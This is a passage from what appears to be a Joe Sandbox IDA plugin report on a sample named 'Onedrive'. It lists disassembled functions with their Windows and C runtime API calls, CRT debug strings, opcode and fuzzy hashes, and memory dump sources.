                                        • API ID: Heap$Process$Free$Allocmemmove
                                        • String ID:
                                        • API String ID: 3442027419-0
                                        • Opcode ID: e712f9ac12633a78c19ab5ec0b286bbeba9ad5bbc8c49b7ef324b6a63908fe2e
                                        • Instruction ID: 0851e681b9fe595c57a2614f3837ce351bcf349c443029465e8771dc642df9e1
                                        • Opcode Fuzzy Hash: e712f9ac12633a78c19ab5ec0b286bbeba9ad5bbc8c49b7ef324b6a63908fe2e
                                        • Instruction Fuzzy Hash: 29318362A08F52D7EE15AFAA664007DBA95FF89FE1B0A8034DE0D87355DF3CE4518300
                                        APIs
                                        • Concurrency::details::_Scheduler::_Scheduler.LIBCMTD ref: 00007FF8A03166B3
                                          • Part of subcall function 00007FF8A03253C0: Concurrency::details::_Scheduler::_Scheduler.LIBCMTD ref: 00007FF8A03253D3
                                          • Part of subcall function 00007FF8A03253C0: __crt_scoped_stack_ptr.LIBCPMTD ref: 00007FF8A03253DD
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.4568144214.00007FF8A0301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A0300000, based on PE: true
                                        • Associated: 00000003.00000002.4568124770.00007FF8A0300000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000003.00000002.4568185783.00007FF8A0342000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000003.00000002.4568209327.00007FF8A0358000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000003.00000002.4568233286.00007FF8A035D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_7ff8a0300000_Onedrive.jbxd
                                        Similarity
                                        • API ID: Concurrency::details::_SchedulerScheduler::_$__crt_scoped_stack_ptr
                                        • String ID: %ls$( (_Stream.is_string_backed()) || (fn = _fileno(_Stream.public_stream()), ((_textmode_safe(fn) == __crt_lowio_text_mode::ansi) && $__acrt_stdio_char_traits<char>::validate_stream_is_ansi_if_required$minkernel\crts\ucrt\inc\corecrt_internal_stdio.h
                                        • API String ID: 4164245112-3476576762
                                        • Opcode ID: 595d77306e7c1ba2192bce2374f2339c1ebf0ddb5053516ebe0f578c2be52e6d
                                        • Instruction ID: 232428a9d98034dbbb70c7039b9240a6979434382e254fffe1b5a4e96c9c482d
                                        • Opcode Fuzzy Hash: 595d77306e7c1ba2192bce2374f2339c1ebf0ddb5053516ebe0f578c2be52e6d
                                        • Instruction Fuzzy Hash: C3418172A2EE43A6EA508B55E480279B3A5FB883D6F501135E68E477E8DF3CE515CB00
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.4568144214.00007FF8A0301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A0300000, based on PE: true
                                        • Associated: 00000003.00000002.4568124770.00007FF8A0300000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000003.00000002.4568185783.00007FF8A0342000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000003.00000002.4568209327.00007FF8A0358000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000003.00000002.4568233286.00007FF8A035D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_7ff8a0300000_Onedrive.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: %ls$D:\a\_work\1\s\src\vctools\crt\vcruntime\src\internal\winapi_downlevel.cpp$cached_fp == invalid_function_sentinel()$cached_fp == new_fp
                                        • API String ID: 0-3288861829
                                        • Opcode ID: 81221ba029a3a9ed0e07fe46d51d06ec6f17ef045b154b741772c52cdf746db2
                                        • Instruction ID: e9be0ee6fa60a8ba5d5da6f4e301855587a4c16404e2e954019243d9564a1be6
                                        • Opcode Fuzzy Hash: 81221ba029a3a9ed0e07fe46d51d06ec6f17ef045b154b741772c52cdf746db2
                                        • Instruction Fuzzy Hash: 1A412C32A1BF43A1EA50DB94E08476A67B8FB853C4FA01535E68D47BA9DF3DE1508B00
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.4568144214.00007FF8A0301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A0300000, based on PE: true
                                        • Associated: 00000003.00000002.4568124770.00007FF8A0300000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000003.00000002.4568185783.00007FF8A0342000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000003.00000002.4568209327.00007FF8A0358000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000003.00000002.4568233286.00007FF8A035D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_7ff8a0300000_Onedrive.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: %ls$D:\a\_work\1\s\src\vctools\crt\vcruntime\src\internal\winapi_downlevel.cpp$cached_handle == INVALID_HANDLE_VALUE$cached_handle == new_handle
                                        • API String ID: 0-3058771551
                                        • Opcode ID: 8169267e5ef227a535ec2129772ca57c7f70ec23d8b582db34dd299050f66a4c
                                        • Instruction ID: 1cda79b96ff42f6234ac670dd5def1ec7db9a8c4366cb0a8666da64d547cadad
                                        • Opcode Fuzzy Hash: 8169267e5ef227a535ec2129772ca57c7f70ec23d8b582db34dd299050f66a4c
                                        • Instruction Fuzzy Hash: 38415B35A2BE47A2EA10CF55E08436A63B4FB843E4F601635E6AE477E4DF3DE1818700
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.4568144214.00007FF8A0301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A0300000, based on PE: true
                                        • Associated: 00000003.00000002.4568124770.00007FF8A0300000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000003.00000002.4568185783.00007FF8A0342000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000003.00000002.4568209327.00007FF8A0358000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000003.00000002.4568233286.00007FF8A035D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_7ff8a0300000_Onedrive.jbxd
                                        Similarity
                                        • API ID: swprintf
                                        • String ID: %.2X $(*_errno())$minkernel\crts\ucrt\src\appcrt\heap\debug_heap.cpp$print_block_data
                                        • API String ID: 233258989-3778139020
                                        • Opcode ID: f612877d82cba73926e19678f2406ce31d19ebf721c80f3c0f04ba7989c069f5
                                        • Instruction ID: dbfd1ac4c3212d1037fcc4a54a9880f1c4147954d4f42539ea22981c83293d24
                                        • Opcode Fuzzy Hash: f612877d82cba73926e19678f2406ce31d19ebf721c80f3c0f04ba7989c069f5
                                        • Instruction Fuzzy Hash: CE311C7260EA8295DB109B55E4902BEBBA0EBC97C1F504036EBCD47BAADF7DD444CB40
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.4568144214.00007FF8A0301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A0300000, based on PE: true
                                        • Associated: 00000003.00000002.4568124770.00007FF8A0300000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000003.00000002.4568185783.00007FF8A0342000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000003.00000002.4568209327.00007FF8A0358000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000003.00000002.4568233286.00007FF8A035D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_7ff8a0300000_Onedrive.jbxd
                                        Similarity
                                        • API ID: BuffersErrorFileFlushLast
                                        • String ID: %ls$("Invalid file descriptor. File possibly closed by a different thread",0)$minkernel\crts\ucrt\src\appcrt\lowio\commit.cpp
                                        • API String ID: 1917127615-1268643607
                                        • Opcode ID: d635cbc310806dabc9f5e613dd8a320b68fb236f3b94d93def20512e2d93046d
                                        • Instruction ID: afd585f87b35b61543dd752bb35e44aa5a742c6d1a963e72500c2a281793f08a
                                        • Opcode Fuzzy Hash: d635cbc310806dabc9f5e613dd8a320b68fb236f3b94d93def20512e2d93046d
                                        • Instruction Fuzzy Hash: 47216076B1AF079AEB509F65E49012A73A5FB98BC1F448531EA4D8B3A4DF3CD410CB40
                                        APIs
                                        • __crt_scoped_stack_ptr.LIBCPMTD ref: 00007FF8A0316216
                                          • Part of subcall function 00007FF8A03166A0: Concurrency::details::_Scheduler::_Scheduler.LIBCMTD ref: 00007FF8A03166B3
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.4568144214.00007FF8A0301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A0300000, based on PE: true
                                        • Associated: 00000003.00000002.4568124770.00007FF8A0300000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000003.00000002.4568185783.00007FF8A0342000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000003.00000002.4568209327.00007FF8A0358000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000003.00000002.4568233286.00007FF8A035D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_7ff8a0300000_Onedrive.jbxd
                                        Similarity
                                        • API ID: Concurrency::details::_SchedulerScheduler::___crt_scoped_stack_ptr
                                        • String ID: %ls$__crt_stdio_output::stream_output_adapter<char>::validate$_stream.valid()$minkernel\crts\ucrt\inc\corecrt_internal_stdio_output.h
                                        • API String ID: 614740146-3062203921
                                        • Opcode ID: da9eb8b382213a47e1979488ef243cce5ad89bb937ccf66715edfc33a6e5e3b0
                                        • Instruction ID: 0d91eb17b81f9e8fd0c24331addee32c920175e0cb02f57cd80bf443252ca4b9
                                        • Opcode Fuzzy Hash: da9eb8b382213a47e1979488ef243cce5ad89bb937ccf66715edfc33a6e5e3b0
                                        • Instruction Fuzzy Hash: AE214832A1AF43A5EF509B91F44536A67A0EB883D1F401435EA8E4BB9ADF7DD1458B00
                                        APIs
                                        • StrToID.DUI70(?,?,?,00007FF6104FB792), ref: 00007FF6104FBAB8
                                        • ?FindDescendent@Element@DirectUI@@QEAAPEAV12@G@Z.DUI70(?,?,?,00007FF6104FB792), ref: 00007FF6104FBACB
                                        • ?SetLayoutPos@Element@DirectUI@@QEAAJH@Z.DUI70(?,?,?,00007FF6104FB792), ref: 00007FF6104FBAEB
                                        • ?SetContentString@Element@DirectUI@@QEAAJPEBG@Z.DUI70(?,?,?,00007FF6104FB792), ref: 00007FF6104FBB1A
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.4568034108.00007FF6104F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6104F0000, based on PE: true
                                        • Associated: 00000003.00000002.4568007903.00007FF6104F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000003.00000002.4568057962.00007FF610501000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000003.00000002.4568082269.00007FF610506000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000003.00000002.4568101163.00007FF610507000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_7ff6104f0000_Onedrive.jbxd
                                        Similarity
                                        • API ID: DirectElement@$ContentDescendent@FindLayoutPos@String@V12@
                                        • String ID: ErrorCID
                                        • API String ID: 3607310075-3250631935
                                        • Opcode ID: ce93dbfc43d74a60a407e702ffc4fe4b9774dc6bdd616480cdfaf7f93e13af0d
                                        • Instruction ID: 95542373f97171127a414af130cdc165b844e5d7105efc143fd0423da427e179
                                        • Opcode Fuzzy Hash: ce93dbfc43d74a60a407e702ffc4fe4b9774dc6bdd616480cdfaf7f93e13af0d
                                        • Instruction Fuzzy Hash: DE113C21B0CF42D3EF059B2AA59017DA6A5EF8AFA4B449030DA0EC3749DF2CE8548740
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.4568144214.00007FF8A0301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A0300000, based on PE: true
                                        • Associated: 00000003.00000002.4568124770.00007FF8A0300000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000003.00000002.4568185783.00007FF8A0342000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000003.00000002.4568209327.00007FF8A0358000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000003.00000002.4568233286.00007FF8A035D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_7ff8a0300000_Onedrive.jbxd
                                        Similarity
                                        • API ID: LibraryLoad$ErrorLastwcsncmp
                                        • String ID: api-ms-
                                        • API String ID: 3100911417-2084034818
                                        • Opcode ID: ba16ec61bd4ea2d1e44a15f40657637409a1c94ef855eeb3ad1471bcfd6b1ded
                                        • Instruction ID: fa2719d90c2b8037f3f6c9d27c7a239e1ae2dac73ce684e3432226a1a3d3ea4d
                                        • Opcode Fuzzy Hash: ba16ec61bd4ea2d1e44a15f40657637409a1c94ef855eeb3ad1471bcfd6b1ded
                                        • Instruction Fuzzy Hash: F0F0EC25E1FD53A2EA609B56E84436B62B0FB857C2FA04030DA8D9AB64DF2DD585CB00
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.4568034108.00007FF6104F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6104F0000, based on PE: true
                                        • Associated: 00000003.00000002.4568007903.00007FF6104F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000003.00000002.4568057962.00007FF610501000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000003.00000002.4568082269.00007FF610506000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000003.00000002.4568101163.00007FF610507000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_7ff6104f0000_Onedrive.jbxd
                                        Similarity
                                        • API ID: Heap$FreeProcess
                                        • String ID:
                                        • API String ID: 3859560861-0
                                        • Opcode ID: 1fd54e66757fca2a8a023022cf3ea0a43d87e6440a2a77e324f2d085da150cf1
                                        • Instruction ID: e6a4cf92d5cf5ce5a372889fdcb59a0dae4bfa5e93e02fb53c6a725bb3c00a04
                                        • Opcode Fuzzy Hash: 1fd54e66757fca2a8a023022cf3ea0a43d87e6440a2a77e324f2d085da150cf1
                                        • Instruction Fuzzy Hash: 2AB15122B04E12A6FF00DA7AC8902BD27A5BF84FA8F464535DA0DCB795DE3DE8558350
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.4568144214.00007FF8A0301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A0300000, based on PE: true
                                        • Associated: 00000003.00000002.4568124770.00007FF8A0300000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000003.00000002.4568185783.00007FF8A0342000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000003.00000002.4568209327.00007FF8A0358000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000003.00000002.4568233286.00007FF8A035D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_7ff8a0300000_Onedrive.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: %ls$_mbstowcs_l_helper$minkernel\crts\ucrt\src\appcrt\convert\mbstowcs.cpp$s != nullptr
                                        • API String ID: 0-454128329
                                        • Opcode ID: 9608f6b4b14059f0dd94b12a202056abb71e65398b216d8978d4c59500cf97fc
                                        • Instruction ID: 9556d060cb78dbf80d36da326af695e5f8ca4b392a523f060e4eb62fe98f3bfd
                                        • Opcode Fuzzy Hash: 9608f6b4b14059f0dd94b12a202056abb71e65398b216d8978d4c59500cf97fc
                                        • Instruction Fuzzy Hash: E2D10E3661DF86D6E7608B15E49036AB7A0F7847A4F105236EA9E87BE8DF3CD444CB01
                                        APIs
                                          • Part of subcall function 00007FF6104F6454: GetProcessHeap.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF6104F7F0D,?,?,?,?,00000000,00000002), ref: 00007FF6104F64C0
                                          • Part of subcall function 00007FF6104F6454: HeapFree.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF6104F7F0D,?,?,?,?,00000000,00000002), ref: 00007FF6104F64D5
                                          • Part of subcall function 00007FF6104F6454: GetProcessHeap.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF6104F7F0D,?,?,?,?,00000000,00000002), ref: 00007FF6104F64F2
                                          • Part of subcall function 00007FF6104F6454: HeapFree.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF6104F7F0D,?,?,?,?,00000000,00000002), ref: 00007FF6104F6507
                                          • Part of subcall function 00007FF6104F6454: GetProcessHeap.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF6104F7F0D,?,?,?,?,00000000,00000002), ref: 00007FF6104F6524
                                          • Part of subcall function 00007FF6104F6454: HeapFree.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF6104F7F0D,?,?,?,?,00000000,00000002), ref: 00007FF6104F6539
                                          • Part of subcall function 00007FF6104F6454: GetProcessHeap.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF6104F7F0D,?,?,?,?,00000000,00000002), ref: 00007FF6104F6556
                                          • Part of subcall function 00007FF6104F6454: HeapFree.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF6104F7F0D,?,?,?,?,00000000,00000002), ref: 00007FF6104F656B
                                          • Part of subcall function 00007FF6104F6454: GetProcessHeap.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF6104F7F0D,?,?,?,?,00000000,00000002), ref: 00007FF6104F6588
                                          • Part of subcall function 00007FF6104F6454: HeapFree.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF6104F7F0D,?,?,?,?,00000000,00000002), ref: 00007FF6104F659D
                                          • Part of subcall function 00007FF6104F6454: GetProcessHeap.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF6104F7F0D,?,?,?,?,00000000,00000002), ref: 00007FF6104F65CD
                                          • Part of subcall function 00007FF6104F6454: HeapFree.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF6104F7F0D,?,?,?,?,00000000,00000002), ref: 00007FF6104F65E1
                                          • Part of subcall function 00007FF6104F3AFC: GetProcessHeap.KERNEL32(?,?,?,00007FF6104F29DD), ref: 00007FF6104F3C8B
                                          • Part of subcall function 00007FF6104F3AFC: HeapFree.KERNEL32(?,?,?,00007FF6104F29DD), ref: 00007FF6104F3C9F
                                        • GetProcessHeap.KERNEL32 ref: 00007FF6104F29E6
                                        • HeapFree.KERNEL32 ref: 00007FF6104F29FA
                                        • GetProcessHeap.KERNEL32 ref: 00007FF6104F2A29
                                        • HeapFree.KERNEL32 ref: 00007FF6104F2A3D
                                        • GetProcessHeap.KERNEL32 ref: 00007FF6104F2A54
                                        • HeapFree.KERNEL32 ref: 00007FF6104F2A68
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.4568034108.00007FF6104F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6104F0000, based on PE: true
                                        • Associated: 00000003.00000002.4568007903.00007FF6104F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000003.00000002.4568057962.00007FF610501000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000003.00000002.4568082269.00007FF610506000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000003.00000002.4568101163.00007FF610507000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_7ff6104f0000_Onedrive.jbxd
                                        Similarity
                                        • API ID: Heap$FreeProcess
                                        • String ID:
                                        • API String ID: 3859560861-0
                                        • Opcode ID: ba35523d65e235fd164357b57aa4c4825c1f669562c9924b140f98673aebaac6
                                        • Instruction ID: f170675f0c7cd86767b6cd9bfaee1303bf1c6c35a04c29c7f3960a0c72940ac3
                                        • Opcode Fuzzy Hash: ba35523d65e235fd164357b57aa4c4825c1f669562c9924b140f98673aebaac6
                                        • Instruction Fuzzy Hash: 46213832A08F41D6EB04AB66A5443B9BBA0FF89F95F49C134DA4E83759CF38D555C304
                                        APIs
                                        • __except_validate_context_record.LIBVCRUNTIMED ref: 00007FF8A03034F3
                                          • Part of subcall function 00007FF8A0303F80: _guard_icall_checks_enforced.LIBCMTD ref: 00007FF8A0303F89
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.4568144214.00007FF8A0301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A0300000, based on PE: true
                                        • Associated: 00000003.00000002.4568124770.00007FF8A0300000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000003.00000002.4568185783.00007FF8A0342000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000003.00000002.4568209327.00007FF8A0358000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000003.00000002.4568233286.00007FF8A035D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_7ff8a0300000_Onedrive.jbxd
                                        Similarity
                                        • API ID: __except_validate_context_record_guard_icall_checks_enforced
                                        • String ID: csm
                                        • API String ID: 95139742-1018135373
                                        • Opcode ID: 9e062fe48b1229129d560821c3fdd2aabcdcb0dd00749ea082b421684da464b9
                                        • Instruction ID: 9730dd2c68e0223e1b8e1ab9e9769bb3908245c1d5cdac64f2dd2044c7f8cc86
                                        • Opcode Fuzzy Hash: 9e062fe48b1229129d560821c3fdd2aabcdcb0dd00749ea082b421684da464b9
                                        • Instruction Fuzzy Hash: 55C1EB7661AB8196DB50CF49E48072AB7B5F7C8B90F505025FA8E87BA8DF3CE550CB00
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.4568144214.00007FF8A0301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A0300000, based on PE: true
                                        • Associated: 00000003.00000002.4568124770.00007FF8A0300000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000003.00000002.4568185783.00007FF8A0342000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000003.00000002.4568209327.00007FF8A0358000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000003.00000002.4568233286.00007FF8A035D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_7ff8a0300000_Onedrive.jbxd
                                        Similarity
                                        • API ID: ErrorLast$FileWrite
                                        • String ID: U
                                        • API String ID: 603252729-4171548499
                                        • Opcode ID: 1ce957338886fed01dbc5d0847df86d0a0983a261123fab51dc7e24824622cb5
                                        • Instruction ID: 74a0f56798e6b3821875931e4bff4265a9d2c78cfe7d1093270884d7eb767740
                                        • Opcode Fuzzy Hash: 1ce957338886fed01dbc5d0847df86d0a0983a261123fab51dc7e24824622cb5
                                        • Instruction Fuzzy Hash: 6171C536609B859ADB60CB59E4403AAB7A1F798BC4F504136EB8D83B68DF7CD455CF00
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.4568144214.00007FF8A0301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A0300000, based on PE: true
                                        • Associated: 00000003.00000002.4568124770.00007FF8A0300000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000003.00000002.4568185783.00007FF8A0342000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000003.00000002.4568209327.00007FF8A0358000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000003.00000002.4568233286.00007FF8A035D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_7ff8a0300000_Onedrive.jbxd
                                        Similarity
                                        • API ID: __crt_scoped_stack_ptr
                                        • String ID: %ls$minkernel\crts\ucrt\src\appcrt\stdio\_flsbuf.cpp$stream.valid()
                                        • API String ID: 1704660383-221745940
                                        • Opcode ID: 329b69d5496cb21c78686117c2c55843c180d98691ed8a2356b140e333f2deab
                                        • Instruction ID: 60927903832b5d0b2a86f555d10cebab75c4b015a67f81777abe8896ddc76d65
                                        • Opcode Fuzzy Hash: 329b69d5496cb21c78686117c2c55843c180d98691ed8a2356b140e333f2deab
                                        • Instruction Fuzzy Hash: 59511121A0EE4362FB10DB25E4522BB6694EF953C0FA00136E68D8A7F7DF7CE5458B41
                                        APIs
                                          • Part of subcall function 00007FF6104F22BC: GetProcessHeap.KERNEL32(?,?,?,00007FF6104F1D5E), ref: 00007FF6104F23D4
                                          • Part of subcall function 00007FF6104F22BC: HeapFree.KERNEL32(?,?,?,00007FF6104F1D5E), ref: 00007FF6104F23E8
                                          • Part of subcall function 00007FF6104F22BC: GetProcessHeap.KERNEL32(?,?,?,00007FF6104F1D5E), ref: 00007FF6104F233B
                                          • Part of subcall function 00007FF6104F22BC: HeapAlloc.KERNEL32(?,?,?,00007FF6104F1D5E), ref: 00007FF6104F234F
                                          • Part of subcall function 00007FF6104F22BC: memmove.MSVCRT(?,?,?,00007FF6104F1D5E), ref: 00007FF6104F237C
                                          • Part of subcall function 00007FF6104F22BC: GetProcessHeap.KERNEL32(?,?,?,00007FF6104F1D5E), ref: 00007FF6104F2392
                                          • Part of subcall function 00007FF6104F22BC: HeapFree.KERNEL32(?,?,?,00007FF6104F1D5E), ref: 00007FF6104F23A6
                                          • Part of subcall function 00007FF6104F4918: _vsnwprintf.MSVCRT ref: 00007FF6104F4958
                                        • StrToID.DUI70 ref: 00007FF6104F35B0
                                        • ?FindDescendent@Element@DirectUI@@QEAAPEAV12@G@Z.DUI70 ref: 00007FF6104F35C2
                                        • ?SetInputScope@TouchEdit2@DirectUI@@QEAAJW4__MIDL___MIDL_itf_inputscope_0000_0000_0001@@@Z.DUI70 ref: 00007FF6104F35D9
                                          • Part of subcall function 00007FF6104FAF8C: ?GetContentString@Element@DirectUI@@QEAAPEBGPEAPEAVValue@2@@Z.DUI70(?,?,00000000,00007FF6104F360B), ref: 00007FF6104FAFB3
                                          • Part of subcall function 00007FF6104FAF8C: ?Release@Value@DirectUI@@QEAAXXZ.DUI70(?,?,00000000,00007FF6104F360B), ref: 00007FF6104FB05A
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.4568034108.00007FF6104F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6104F0000, based on PE: true
                                        • Associated: 00000003.00000002.4568007903.00007FF6104F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000003.00000002.4568057962.00007FF610501000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000003.00000002.4568082269.00007FF610506000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000003.00000002.4568101163.00007FF610507000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_7ff6104f0000_Onedrive.jbxd
                                        Similarity
                                        • API ID: Heap$Direct$Process$Element@Free$AllocContentDescendent@Edit2@FindInputL___L_itf_inputscope_0000_0000_0001@@@Release@Scope@String@TouchV12@Value@Value@2@@W4___vsnwprintfmemmove
                                        • String ID: CIDEdit%d
                                        • API String ID: 1228671443-56484913
                                        • Opcode ID: b3f517ad8b8d331d28c16e3b81a7e2f2708fd587a33e129d640477db628184b2
                                        • Instruction ID: a132d81805989651eb0c9b47537dc6b9200666a318a242ae824e21e04c594029
                                        • Opcode Fuzzy Hash: b3f517ad8b8d331d28c16e3b81a7e2f2708fd587a33e129d640477db628184b2
                                        • Instruction Fuzzy Hash: D8317221708E42E2FF20AB26E4902A97399FB88FA5F459435DE4DC7755DF3CE5168700
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.4568144214.00007FF8A0301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A0300000, based on PE: true
                                        • Associated: 00000003.00000002.4568124770.00007FF8A0300000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000003.00000002.4568185783.00007FF8A0342000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000003.00000002.4568209327.00007FF8A0358000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000003.00000002.4568233286.00007FF8A035D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_7ff8a0300000_Onedrive.jbxd
                                        Similarity
                                        • API ID: Concurrency::details::_SchedulerScheduler::_
                                        • String ID: %ls$minkernel\crts\ucrt\src\appcrt\stdio\_freebuf.cpp$public_stream != nullptr
                                        • API String ID: 2780765137-1254537880
                                        • Opcode ID: 9671912013f427561da62cdbcbe0db84c4c5786f34d3e8db949c768f68d6365d
                                        • Instruction ID: 738cdf267c00fd21f016d176591218f04976d54ea48f87c834fa04ef0e30a181
                                        • Opcode Fuzzy Hash: 9671912013f427561da62cdbcbe0db84c4c5786f34d3e8db949c768f68d6365d
                                        • Instruction Fuzzy Hash: 36216261A3AE43A1E740DB50E4413BA6364FFA4780F901031E58D867E7EF7CE548C740
                                        APIs
